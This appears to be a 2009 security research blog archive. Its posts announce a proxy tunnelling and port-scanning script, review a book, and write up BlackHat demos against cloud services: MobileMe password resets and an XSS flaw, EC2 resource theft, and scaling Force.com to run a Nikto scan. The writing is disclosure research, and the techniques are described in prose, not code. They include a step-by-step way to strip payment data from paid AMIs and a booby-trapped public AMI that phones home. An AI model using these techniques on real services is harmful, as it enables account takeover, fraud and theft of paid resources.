Grey bar Blue bar
Share this:

Wed, 26 Aug 2009

MonSoen.py

I was recently playing with a Wingate Proxy server, came across some arbitrary interestingness.

So, WinGate proxy includes a remote management agent which is accessed via a client utility called GateKeeper. This allows one to configure the WinGate server across the network. However, its not enabled to listen on the network by default, and only listens on 127.0.0.1:808. From my perusal of the documentation, the remote administrative facility should only be available to enterprise and professional license holders, and those firms using standard edition licenses will have to configure their proxy software locally.

In any case, WinGate proxy supports using CONNECT methods to negotiate connections for SSL-based web-sites etc, but no access control is in place to prevent users using this method to connect to 127.0.0.1:808. This, along with some python-fu, makes it a trivial task to access the remote administration service across the network. This is illustrated in the following images.

[caption id="attachment_3882" align="alignnone" width="300" caption="Tunnelling with MonSoen - Connected to GateKeeper"]

Tunnelling with Monsoen - Connected to GateKeeper
[/caption]

Naturally, after knocking together a little proxy tunnel script, I remembered an idea Gareth had a number of years ago for scanning networks and port ranges via badly configured proxies, and decided to incorporate them into the original tunnel script. An example is illustrated in the following image...

[caption id="attachment_3878" align="alignnone" width="300" caption="Scanning with MonSoen"]

Scanning with MonSoen
[/caption]

So, enter MonSoen.py. A cute (and probably entirely unnecessary) python-based script for tunnelling connections through proxy servers, scanning networks using GET or CONNECT and otherwise being miserable to others (nods at Gareth).

It's going to need the python netaddr module. MonSoen is available from http://www.sensepost.com/research_misc.html

Ian.

Sun, 23 Aug 2009

John Viega's "the myths of security".. Really??

i go through a ton of books. Over the past 10 years, this has been dominated by books on computer security, computer science, programming (and some sprinklings of management classics).

I generally stay away from writing reviews, but was genuinely suprised at the number of 5 star reviews Viega's new book had received and felt i had to chime in.

I picked up "the myths of security" (what the computer industry doesn't want you to know) with hope, because O'Reilly books in general are well done and i really liked some of Johns previous books. Alas! I tried hard to think of a good thing to say about the book, and the best i can come up with right now is that "at least, it wont take up space on my bookshelf".

The book is tiny (48 chapters, where each chapter is between a paragraph to 2-3 pages) which isn't a bad thing, but it reads mostly as a collection of blog posts or hurriedly written notes-to-self.

Advertising++ The Foreword alone uses the word McAfee 14 times, and over the 48 chapters, the word McAfee goes on to appear about 65 times. This is acceptable on a blog, in a book i just paid for its slightly annoying.

Target Audience I agree with Bejtlich who cant figure the books target audience. One chapter might give explanations in crayon (presumably for the less sophisticated user) while the next chapter might give advice for how to label the security technology you plan to sell.

Consistency There are a number of times in the book where the author takes opposite sides of an argument (in different chapters). This is useful if coherently positioned as 2 sides of an argument, but if this is used on different arguments on different pages, it seems more like the author is merely choosing the position thats convenient to support his view at the time...

It's slightly odd when compared with his take on security spend to hear the author say this about the TSA and their "Security Theater": "But there's some hidden value here—it makes people feel safer. Whether it works well or poorly, it is better than nothing and it makes people feel better."

General whining (by me). The author dedicates a chapter to Mobile Phones titled "OK, Your Mobile Phone Is Insecure; Should You Care?". He concludes with: "Sure, there will always be the occasional virus for smartphones, but I don't see an epidemic emerging. At the end of the day, there is still lower-hanging fruit for the bad guys. It is still far easier for them to make money attacking traditional PCs and laptops then going after mobile phones. That may eventually change, but I'm not going to hold my breath."

I think the view that you only need to be worried about the ability of your device to withstand an attack "epidemic" is wrong on so many levels. Im far less worried about my iPhone becoming part of a botnet than i am of the fact that these days huge parts of my life are on it, and can be grabbed by Charlie Miller if he is willing to pay the $0.20 to send me a few SMS'es.

In his Epilogue, he writes: "But instead of preaching that the customer is hosed, I'm preaching that the security industry is hosed—I don't think customers are hosed at all." which is an interesting contrast to his chapter on PKI that ends with "That leaves the Internet fundamentally broken."..

Of course the lines that most bothered me were in the chapters on Privacy and Anonymity. Privacy gets just under 200 words but includes the classic line: "privacy is nice in theory, but if you don't have anything to hide, what's the big deal?"

Hmm.. OK.. lets see the take on anonymity before responding.

Anonymity gets 166 words (wow - 100 words more than the word McAfee!) and once more ends with the classic: "Oh, and I've got nothing to hide anyway…."

The author cites the example of Zero-Knowledge, who built a paid service to surf anonymously which "worked pretty well, but nobody cared".

Once more, i think there is so much wrong here, that im not sure where to start. Having to convince someone that Privacy is important even if you cant sell it seems like a pretty old argument to be having..

In general, i think its safe to say that the book left me disappointed, and a little bit afraid that somewhere decision makers could be forming an opinion on an entire industry based on ~250 words dedicated to a topic that deserves much more thought..

/mh

Sun, 9 Aug 2009

BlackHat presentation demo vids: MobileMe

[part 5 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]

Goal

The final installment of our BlackHat video series showcases weaknesses in the password reset feature for Apple's MobileMe service as well as publicizing an XSS vulnerability in the application. At first glance the choice of MobileMe may seem arbitrary, but it was useful for a number of reasons. MobileMe is one of the more popular consumer-focused cloud services and it's a good example of the feature-creep that's a hallmark of cloud systems. By compromising a user's MobileMe account an attacker has access to much more than just the user's mail. With each new feature addition the user is sucked into the service a little more until most of their data is stored within MobileMe, and a compromise of the account becomes serious for the user.

To this end, we were arrived at the point where, if we were a little more malicious, we could read Steve Wozniak's mail, peruse his calendar, follow his physical location on Google Maps and embed JavaScript in his MobileMe account for contuined access.

Background

Apple's MobileMe product (formely .Mac) provides users with a number of subscription-based services for interacting and existing online including push mail, contacts, calendaring, storage, photos and iPhone integration. These are delivered via a web interface and the infrastructure is managed by Apple.

Video 1: Password Reset

Performing authentication on a massive userbase with whom there is zero offline interaction is hard, especially when it comes down to the degraded authentication required by password reset processes. Considering that web interfaces appear to be the dominant channel by which cloud services are managed (we touch on the implications here), a flawed password reset process can mean that attackers gain access to more that simply your mail.

In August last year, TechCrunch published a way to enumerate usernames on MobileMe. We abused this further to target a specific user on MobileMe in order to reset his password. As the video shows, the process only requires a birthdate (which is generally obtainable either through FaceBook, Wikipedia, Amazon wishlists or the like) and a secret question. Again, with enough digging the answer to the secret question is often guessable. In the video above we show a toy example of the password reset working against a SensePoster.

Video 2: XSS in iPhone name

This video demonstrates an XSS vulnerability that we found in the iPhone/MobileMe integration. By inserting JavaScript into the iPhone's name, this was displayed on the "Find My iPhone" page on MobileMe. Some slight trickery was required as the JavaScript was truncated in two points in the page but passed through untouched in three others; by extending the name and embedding the JavaScript past the truncation point we solved this issue.

Apple has since patched this bug.

Video 3: Woz's mail

Finally, we demonstrate the password reset attack against Woz's MobileMe account. We stopped before actually resetting his password, but in his own words he stores mail, calendaring info and other information that is sensitive to him on MobileMe, and the ability to XSS the page would mean that the continued compromise of the account was possible.

Conclusion

The reliance on web interfaces to control cloud services has unintended consequences. With the feature-creep that takes place, more and more of our data is placed in the cloud yet the security controls remain at the level used to protect Hotmail or Amazon bookstore accounts. By piecing together publicly available information, we can generate a profile that is sufficiently complete for a password reset, which points to flaws within the reset process.

Sat, 8 Aug 2009

BlackHat presentation demo vids: Amazon

[part 4 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]

Goal

In the fourth installment of our BlackHat video series, we turned our attention to Amazon's cloud platform and focused on their Elastic Compute Cloud (EC2) service specifically.

Theft of resources is the red-headed step-child of attack classes and doesn't get much attention, but on cloud platforms where resources are shared amongst many users these attacks can have a very real impact. With this in mind, we wanted to show how EC2 was vulnerable to a number of resource theft attacks and the videos below demonstrate three separate attacks against EC2 that permit an attacker to boot up massive numbers of machines, steal computing time/bandwidth from other users and steal paid-for AMIs.

Background

EC2 enables users to boot and run virtual machines that are custom-configured by the user but execute within Amazon's cloud. Each virtual machine or Amazon Machine Instance (AMI) has its own IP, non-persistent storage, CPU and network connection. The service is full-featured and we won't go into all details here, more info is available from the EC2 site. With that said we'll point out three key facts that shaped our testing:
  1. The service is controlled via a web interface so sign-up obviously occurs in a browser. Sign-up requires minimul information, essentially just an email and credit card info.
  2. When booting an AMI, users can either create their own image from scratch or they can choose from a list of pre-built AMIs which are overwhelmingly supplied by other EC2 users.
  3. Amazon provide a facility called DevPay by which users can create AMIs for leasing to other users; when a non-free AMI is run then the user running the instance is charged a fixed rate and the proceeds are split between the creator of the instance and Amazon.

Video 1: AMIBomb

For this video we wanted to consider a DoS on the EC2 from within, by running as many AMIs concurrently as possible.

Since sign-up for the sevice occurred in a browser, it was possible to script this process (using Twill for the most part). The first attack would be to boot hundreds or thousands of instances under one Amazon account, however an upper bound of 20 running machines per account is enforced by Amazon. Our approach was one step removed from this; we created multiple accounts and then ran the 20 machines. Each new account would also create multiple accounts and then run 20 machines. One iteration of the create-accounts-and-boot-AMIs cycle took three minutes; by the ninth iteration the projected number of running instances is ridiculous. It's apparent that this recursive registering of accounts and booting machines means that the number of running machines grows exponentially and this could continue until the system can't handle the machine load.

Our approach was effective because the registration process took no steps to prevent automated sign-up. In testing a single credit card was used to create our accounts which is an immediate anomaly however a malicious attacker would use stolen CC data to ensure that CC checks did not prevent new account registration.

Video 2: AMI Registration Race

As has been mentioned, users can choose AMIs from a list of machines that is mostly user-generated (out of 2700 odd machines, 47 were built by Amazon and the remainder by other users.) It is easy to add a machine to this list; simply create a new AMI and in its properties mark it as 'public'.

Our idea was to create a malicious AMI and add it to the public listing, with the goal being to show that users will run AMIs without any consideration for who built it or whether nasties were included. We quickly created an AMI, uploaded it and... nothing. No one ran the image and it seemed that people weren't so easily fooled.

Digging a little deeper, however, revealed that when our image was created, it was dumped on the second last page of the AMI listings and so users would have to surf through more than 50 pages of images before coming across our AMI. If Google has taught us anything, it's that ranking counts and so we needed to boost our machine up the AMI listing.

It turns out that the AMI listing is ordered by the AMI ID, which is a random id string that is generated when the AMI is created. Our process was then slightly modified as follows: we scripted the AMI registration process so that it was trivial to register an image. We then looped the registration script to create and register an AMI, and tested to see whether the randomly assigned AMI ID was low enough such that our AMI was listed on the first page.

Our first attempt took about 4000 iterations and landed us a top 5 spot in under 12 hours. A subsequent attempt took less than 4 hours to land a top 5 spot.

This was great, but our image was unattractively named 'qscanImage' runing on the 'Other Linux' platform, which didn't say much about it.

It turned out that we had a great degree of freedom in naming images. Images were stored in Amazon S3 buckets and the buckets had globally unique names. We tried buckets with names such as 'fedora', 'fedora_core' and 'redhat', but all these were taken, however with a small degree of evilness the bucket 'fedora_core_11' was available and so registered. The registration race was repeated with the better named machine, and after a little while we landed the AMI on the front page as shown in the screnshot below:

What's funny is that the machine was the highest listed 'Fedora' AMI, so a user who was specifically looking for a Fedora image would come across our evil image first.

In reality our image did not have anything malicious except a call-home line in '/etc/rc.local' that would 'wget' a file on our webserver, to show the image had been booted. The screenshot below shows the logline from our webserver which proved the image had been booted; this occurred in a little under four hours after the instance had been made public.

Video 3: AMI Stealing

Our final Amazon video shows how it is possible to remove ancestry information from AMIs. When a paid-for machine is created, Amazon stores information about the owner of the machine in its manifest (which is an XML document) in order to pay the creator of the image. Our attack works as follows:

  1. Purchase a paid-for image
  2. Use Amazon's tools to create a bundle from the running AMI
  3. Download the manifest for the bundle
  4. Modify the manifest by removing the associated product code and owner information
  5. Resign the manifest using Amazon's tools
  6. Upload the manifest
  7. Register a new AMI using the bundle that was copied from the paid-for AMI, along with the edited manifest
  8. Stop using the original paid-for AMI
Using this attack, it is possible to pay once for an AMI, create a copy and never pay the creator again.

Conclusion

In this set of three videos, we showed attacks against the Amazon EC2 platform that do not target specific weaknesses in technologies; rather the processes by which complex actions took place were abused to our benefit. In doing so, we managed to sketch a scenario by which a local DoS might be effected against EC2, successfully showed how easy it was to have users run untrusted AMIs and lastly described a method by which non-free AMIs may be stripped of owner information, thereby foregoing income to the AMI creator and allowing the attacker to continue using the paid-for AMI without cost.

BlackHat presentation demo vids: SalesForce Sifto

[part 3 in a series of 5 video write-ups from our BlackHat 09 talk, summary here]

Goal

Our third video write-up covers abuse of cloud services. By signing up for free accounts, it is possible to gain access to small amounts of free resources, specifically processing time and bandwidth. However these resources are tightly controlled to maintain fairness across the many thousands of users who share the same platform.

We aim to circumvent some of these controls in order to access more resources than should be allowed, and we demonstrate this on the Force.com platform which supports the ability for a developer to upload and execute custom code. Our proof-of-concept was to port Nikto into a Force.com application, and we named it Sifto.

Background

SalesForce's primary offering is a web-based CRM solution which they manage, and they also provide developers with the ability to write custom applications that run on the Force.com platform. They are a major player in the cloud universe with almost 60 000 customers, revenue over $1 billion and are a member of the S&P 500 index.

In order to write applications on Force.com, a developer account is required (this is freely available). Applications are coded in the Apex language, a Java-like language for business logic, and is proprietary to the Force.com platform. This platform supports datastore operations through built-in language constructs and the API enables a developer to make HTTP callouts, tie Apex code to WS endpoints within Force.com, send emails as well as tie Apex code to an email endpoint within Force.com. The datastore is useful for maintaining state between multiple iterations of the event loop (described shortly) as well as providing a way to send emails for free via update triggers (emails sent from within Apex count against the daily limit).

With all this in mind, we focused on creating event loops the were initiated by a single user action, to show how significant free computing resources were available if one is prepared to put in the legwork of learning new languages and platforms.

Video 1

  1. The first part of the video runs through the setup required within the Force.com account to create the Sifto application. This included the custom Apex, custom objects, datastore trigger that sent an email, email endpoint that received the trigger and invoked our Apex and showed that the target was not added to the "Allowed endpoints". (The last point might require more explanation: while Apex code can make HTTP requests, the platform only permits HTTP requests to previously allowed sites. An administrator can allow a given site by navigating the Force.com administration interface and adding it, but this requires a manual process for each new Sifto target so we needed to automate this process.)
  2. Part two of the video runs through the initialisation of a Sifto scan against a new target. The attacker shows us his wrapper script for kicking off the scan; all it does it send a specially formatted email to a specific Force.com address. Meanwhile, we tail the victim's httpd access_log to show the scan as it comes through. Incidentally, the 'tail' in the video was not sped up and shows the actual speed at which results came through. What's also noticeable is that as results are found, they're returned via email to the attacker.
  3. In part three we simply show that the target site was automatically added as an allowed endpoint within Force.com. We achieved this by auto-browsing the Force.com site from within Apex code, a surprisingly kludgey bit of code, but nicely demonstrates that all configurations options are available from within Apex, and so Apex can modify the environment within which it operates.
  4. Part four depicts the scanning as it continues.
  5. Part five reveals the results of the scan as they slowly arrive via email.
  6. The scan ends in part six.
  7. Finally, part 7 shows the overall results of the scan listed in a single email, and importantly shows how the entire scan of almost 3000 tests ran in about 11 minutes.

Video 2

The event loop method shown in video 1 was still subject to unpublished limits, and so instead of scaling by extending the number of iterations of the event loop, we decided to try and scale by registering many accounts. This was useful since accounts had zero cost. All that remained was to automate the registration process (see the slides for more details on this), and we accomplished this as shown in video 2, where a shell script automatically registered a bunch of accounts. The trick that allowed us to bypass the CAPTCHA in the registration page was a bug in the CAPTCHA script that also provided the image's text in ASCII-text (look for the lines "captcha captured:" in the video).

Of minor interest was that each account was registered in a different country. Since SalesForce assign accounts to instances (or geographically dispersed clusters) according to the customer's claimed location, we were able to register accounts on both the NA6 and AP1 instance, or North America and Asia Pacific respectively.

Conclusion

Cloud computing provides us with a tantalizing taste of vastly expanded resources and the plethora of services means that free or trial accounts abound. It's possible to stitch together the free resources to to produce a useable computing platform that can take advantage of the expanded resources without incurring cost to the attacker; the downside is that this is platform-specific and may require the learning of new technologies.